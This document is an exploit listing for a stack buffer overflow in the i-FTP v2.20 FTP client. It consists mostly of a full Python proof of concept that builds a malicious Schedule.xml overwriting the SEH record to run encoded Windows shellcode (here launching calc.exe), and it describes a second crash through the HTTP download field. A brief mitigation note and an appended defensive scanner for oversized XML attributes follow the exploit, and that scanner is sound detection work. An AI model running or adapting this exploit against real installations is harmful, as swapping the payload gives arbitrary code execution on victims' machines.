Vendor: i-FTP
Author: metacom
CVSS: 7.5 (HIGH)
CWE: 119 (Buffer Overflow)
Product Name: i-FTP
Affected Version From: i.Ftp v2.20
Affected Version To: i.Ftp v2.20
Patch Exists: NO
Platforms Tested: Windows
Year: 2014

i-FTP Buffer Overflow SEH

This exploit takes advantage of a buffer overflow vulnerability in i-FTP v2.20 that allows an attacker to execute arbitrary code. It overwrites the Structured Exception Handler (SEH) record to redirect program execution into the attacker's shellcode. The shellcode payload used in this exploit spawns the Windows calculator. The exploit has been tested on several Windows platforms, including Windows 7 32-bit, Windows 8.1 64-bit, and Windows XP SP3.

Mitigation:

Apply the latest security patch or upgrade to a newer version of i-FTP. Note that this listing records no vendor patch (Patch Exists: NO); until one is available, only load Schedule.xml files and HTTP download file names that come from trusted sources.

Exploit-DB raw data:

#!/usr/bin/python
#Exploit Title:i-FTP Buffer Overflow SEH
#Homepage:http://www.memecode.com/iftp.php
#Software Link:www.memecode.com/data/iftp-win32-v220.exe
#Version:i.Ftp v2.20 (Win32 Release)
#Vulnerability discovered:26.10.2014
#Description:Simple portable cross platform FTP/SFTP/HTTP client.
#Tested on:Win7 32bit EN-Ultimate - Win8.1-DE 64bit - Win XPsp3-EN
#Exploit Author:metacom  --> twitter.com/m3tac0m

import struct
def little_endian(address):
  return struct.pack("<L",address)
poc = "\x41" * 591
poc += "\xeb\x06\x90\x90"
poc += little_endian(0x1004C31F)  # 1004C31F   5E   POP ESI
poc += "\x90" * 80
# msfpayload windows/exec EXITFUNC=seh CMD=calc.exe R
# | msfencode -e x86/alpha_upper -b "\x00\x0a\x0d\x20\x22" -t c
poc+=("\x89\xe7\xda\xce\xd9\x77\xf4\x58\x50\x59\x49\x49\x49\x49\x43"
"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34"
"\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41"
"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58"
"\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4b\x58\x4d\x59\x35\x50"
"\x53\x30\x55\x50\x43\x50\x4d\x59\x4d\x35\x46\x51\x39\x42\x55"
"\x34\x4c\x4b\x51\x42\x30\x30\x4c\x4b\x51\x42\x44\x4c\x4c\x4b"
"\x51\x42\x32\x34\x4c\x4b\x54\x32\x31\x38\x44\x4f\x58\x37\x30"
"\x4a\x57\x56\x50\x31\x4b\x4f\x36\x51\x4f\x30\x4e\x4c\x57\x4c"
"\x33\x51\x43\x4c\x44\x42\x46\x4c\x31\x30\x4f\x31\x58\x4f\x44"
"\x4d\x45\x51\x38\x47\x5a\x42\x5a\x50\x31\x42\x46\x37\x4c\x4b"
"\x46\x32\x42\x30\x4c\x4b\x30\x42\x47\x4c\x55\x51\x48\x50\x4c"
"\x4b\x51\x50\x44\x38\x4b\x35\x39\x50\x44\x34\x30\x4a\x53\x31"
"\x48\x50\x46\x30\x4c\x4b\x51\x58\x35\x48\x4c\x4b\x51\x48\x57"
"\x50\x45\x51\x58\x53\x4b\x53\x47\x4c\x47\x39\x4c\x4b\x37\x44"
"\x4c\x4b\x53\x31\x58\x56\x50\x31\x4b\x4f\x36\x51\x4f\x30\x4e"
"\x4c\x59\x51\x58\x4f\x54\x4d\x43\x31\x39\x57\x56\x58\x4b\x50"
"\x33\x45\x4b\x44\x43\x33\x43\x4d\x5a\x58\x47\x4b\x53\x4d\x31"
"\x34\x52\x55\x4a\x42\x50\x58\x4c\x4b\x50\x58\x57\x54\x43\x31"
"\x49\x43\x55\x36\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x30\x58\x45"
"\x4c\x55\x51\x58\x53\x4c\x4b\x34\x44\x4c\x4b\x43\x31\x38\x50"
"\x4c\x49\x30\x44\x31\x34\x57\x54\x51\x4b\x31\x4b\x53\x51\x30"
"\x59\x51\x4a\x36\x31\x4b\x4f\x4b\x50\x36\x38\x51\x4f\x51\x4a"
"\x4c\x4b\x55\x42\x4a\x4b\x4d\x56\x51\x4d\x42\x4a\x53\x31\x4c"
"\x4d\x4b\x35\x58\x39\x33\x30\x35\x50\x33\x30\x56\x30\x33\x58"
"\x30\x31\x4c\x4b\x42\x4f\x4d\x57\x4b\x4f\x39\x45\x4f\x4b\x4b"
"\x4e\x44\x4e\x56\x52\x5a\x4a\x53\x58\x39\x36\x4d\x45\x4f\x4d"
"\x4d\x4d\x4b\x4f\x38\x55\x47\x4c\x34\x46\x33\x4c\x54\x4a\x4b"
"\x30\x4b\x4b\x4b\x50\x53\x45\x45\x55\x4f\x4b\x50\x47\x52\x33"
"\x42\x52\x42\x4f\x42\x4a\x55\x50\x31\x43\x4b\x4f\x4e\x35\x53"
"\x53\x55\x31\x32\x4c\x45\x33\x46\x4e\x52\x45\x44\x38\x52\x45"
"\x55\x50\x41\x41")
poc+="\x90" * (20000 - len(poc))
# The hex header decodes to the Schedule.xml skeleton, with the oversized
# value placed in the Time attribute:
#   <?xml version="1.0" encoding="UTF-8" ?>\n<Schedule>\n\t<Event Url="" Time="http://\n
header = "\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22"
header += "\x55\x54\x46\x2d\x38\x22\x20\x3f\x3e\x0a\x3c\x53\x63\x68\x65\x64\x75\x6c\x65\x3e\x0a\x09\x3c\x45\x76\x65\x6e\x74\x20\x55"
header += "\x72\x6c\x3d\x22\x22\x20\x54\x69\x6d\x65\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x0a" + poc
# The footer decodes to:  " Folder="" />\n</Schedule>\n
footer = "\x22\x20\x46\x6f\x6c\x64\x65\x72\x3d\x22\x22\x20\x2f\x3e\x0a\x3c\x2f\x53\x63\x68\x65\x64\x75\x6c\x65\x3e\x0a"
exploit =  header + footer
filename = "Schedule.xml"
file = open(filename , "w")
file.write(exploit)
print "\n[*]Vulnerable Created Schedule.xml!"
print "[*]Copy Schedule.xml to C:\Program Files\Memecode\i.Ftp"
print "[*]Start IFTP"
print "[*]----------------------------------------------------"
file.close()
print '''
[+]Second Vulnerability
[-]You can also enter the contents 20000 A of the file in the -->
 * HTTP -> HTTP Download --> Option "FILE" to cause this crash
 * Access violation - code c0000005 (!!! second chance !!!)
 * 0:003> !exchain
 * 016fff2c: 41414141
 * Invalid exception stack at 41414141'''
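As an added defensive check, not part of the exploit above or of i.Ftp itself, the following scans a Schedule.xml (the file the script writes; its hex header and footer decode to an `<Event Url="" Time="..." Folder="" />` entry) for the shape of the crash input: an attribute value far beyond the 591 bytes that reach the SEH record, or one carrying non-text bytes. The 512-byte threshold, the byte-level regex scanner and the sample files are constructed assumptions.

```python
import re

# Threshold for one attribute value. The page's crash needs 591 bytes of padding
# before the SEH record is reached, so a value near that length is abnormal for
# a scheduler entry. The 512-byte limit is an assumed value, not a vendor figure.
MAX_ATTR_LEN = 512

# Byte-level scanner. A poisoned Schedule.xml is not valid UTF-8 (the padding
# and payload carry bytes such as 0x90), so an XML parser rejects it before the
# values could be inspected; a regex over raw bytes still sees every attribute.
ATTR_RE = re.compile(rb'([A-Za-z_][\w.-]*)\s*=\s*"([^"]*)"')

def oversized_attributes(data, limit=MAX_ATTR_LEN):
    """Return (name, length) for every attribute value longer than `limit`."""
    return [(name.decode("ascii"), len(value))
            for name, value in ATTR_RE.findall(data) if len(value) > limit]

def binary_attributes(data):
    """Return names of attributes holding bytes outside printable ASCII and whitespace."""
    return [name.decode("ascii") for name, value in ATTR_RE.findall(data)
            if any(b > 0x7E or (b < 0x20 and b not in b"\t\r\n") for b in value)]

def classify_schedule(data, limit=MAX_ATTR_LEN):
    """Return ('clean', []) or ('suspicious', findings) for one Schedule.xml blob."""
    findings = ["%s: %d bytes" % f for f in oversized_attributes(data, limit)]
    findings += ["%s: non-text bytes" % n for n in binary_attributes(data)]
    return ("suspicious" if findings else "clean"), findings

# Constructed samples (not files taken from the page): a benign entry, and one
# whose Time attribute carries the 20000-byte run of 'A' that the page's second
# crash case describes, inside the same Schedule.xml skeleton the script writes.
SKELETON_HEAD = b'<?xml version="1.0" encoding="UTF-8" ?>\n<Schedule>\n\t<Event '
SKELETON_TAIL = b' />\n</Schedule>\n'
BENIGN_XML = SKELETON_HEAD + b'Url="ftp://example.invalid/pub/" Time="12:00" Folder="dl"' + SKELETON_TAIL
OVERSIZED_XML = SKELETON_HEAD + b'Url="" Time="http://\n' + b"A" * 20000 + b'" Folder=""' + SKELETON_TAIL

if __name__ == "__main__":
    for label, blob in (("benign", BENIGN_XML), ("oversized", OVERSIZED_XML)):
        verdict, findings = classify_schedule(blob)
        print(label, verdict, findings)
```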